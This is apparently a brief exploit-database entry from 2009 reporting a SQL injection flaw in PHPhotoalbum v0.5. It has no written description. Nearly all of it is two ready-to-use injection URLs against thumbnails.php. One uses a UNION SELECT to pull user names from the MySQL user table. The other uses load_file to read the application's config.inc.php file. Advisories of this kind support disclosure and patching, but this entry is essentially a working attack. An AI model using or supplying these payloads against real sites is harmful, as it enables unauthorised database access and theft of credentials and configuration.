PHPhotoalbum v0.5 SQL Injection Vulnerability

2009-12-21T00:00:00
ID SSV:18646
Type seebug
Reporter Root
Modified 2009-12-21T00:00:00

Description

No description provided by source.

# Title: PHPhotoalbum Remote SQL Injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--